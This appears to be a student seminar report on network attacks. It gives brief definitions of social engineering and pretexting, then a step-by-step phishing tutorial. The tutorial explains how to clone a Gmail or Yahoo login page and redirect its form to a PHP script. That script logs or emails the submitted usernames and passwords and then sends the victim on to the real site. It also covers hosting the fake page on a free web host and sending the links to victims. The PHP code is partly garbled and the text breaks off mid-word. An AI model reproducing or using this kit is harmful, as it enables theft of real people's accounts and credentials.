Submitted To: Mr.

Pankaj Bajaj CSE/IT Dept HOD

Submitted By: Anuj Kumar Janender Kumar Parveen Sindhar

Computer networks that are currently to the internet are vulnerable to a variety of exploits that can compromise their intended operations. Systems can be subject to denial of Service attacks that prevents other computer from connecting to them for their provided service (e.g. web server) or prevent them from connecting to other computer on the Internet. They can be subject to attacks that cause them to cease. Operations either temporary or permanently. A hacker may be able to compromise a system administrator. The number of exploits targeted against various platforms, operating systems, and applications increases on daily basis. System administrators are usually responsible for monitoring the overall security of their networks.


1.

Non Technical Attack

Social Engineering 2. Pretexting

1.

Technical Attack

Phishing 2. SQL injection 3. Keyloggers

Social Engineering:-Most of us are suckered at some point in our lives: coaxed, threatened, heart-strung or baited into doing something against our better judgment. After it happens, we often feel foolish, although in truth, falling for a con is seldom a question of intelligence. As humans, we are bound by both nature and nature to the social contract which like many contracts might be twisted to our disadvantages. Such twisting is called social engineering. Social engineering is the name given to a category of security attacks in which some one manipulates others into revealing information that can be used to steal, data access to systems access to cellular phones, money or even your own identity. Such attacks can be very simple or very complex. Gaining access to information over the phone or through web sites that you visit has added a new dimension to the role of the social engineer

Pretexting:-Pretexting is the act of creating and using an invented scenario to obtain information from target, usually over the telephone. It is more than a simple lie, as it regularly involves some prior research and the use of pieces of known information(eg.for impersonation, birthday,social security number,last employer,mothers maiden name).This establishes legitimacy in the mind of the target.

Phishing:- Phishing attacks use both social engineering and technical subterfuge to steal consumers personal identity data and financial account credentials. In phishing mainly we used some WebPages of mail accounts or any login of some pages from which username and passwords are steal due to this we can login in any victims account.

Step1: Open any email server account web page like gmail.com and right click on the page and then click on view source. Step2:Press Ctrl+F and then find POST(please find the post related with login form). Step3: Then Replace Action= HYPERLINK "https://login.yahoo.com/config/loginhttps://login.yaho o.com/config/login? With Action =safin.phpHere safin.php is php file which consist of a php script which help in posting the username and password to the web server or on any free hosting site like eg:www.my3gb.com

Code Of PHP Script:-

<?php header ('Location: http://www.gmail.com'); $posts = ''; foreach($_POST as $k => $v) { $posts .= '$_POST['.$k.'] = '.$v."\n";} $posts .= "---------------------------------------------------\n"; $subject = $_SERVER['HTTP_HOST']. ".$_SEREVER['SERVER_NAME']; $body = ''.$posts.'

@mail($emailto, $subject, $body, $from); $handle = @fopen("cool.txt", "a+");@fwrite($handle, $posts); fclose($handle);

Step 4: Then save the page as anyname.html Step 5: Open safin.php script and at location add the URL at which to redirect the page.
.

Step 6: Then upload the page and safin.php script on a webserver. Here I am using HYPERLINK "http://www.my3gb.com"www.my3gb.c om. Step 7:Then Transfer the links to the victims and if the victim will try to login from your page the on your web server a auto cool.txt will be created in which you can see the password

Create an account on any free webhosting site.

Registering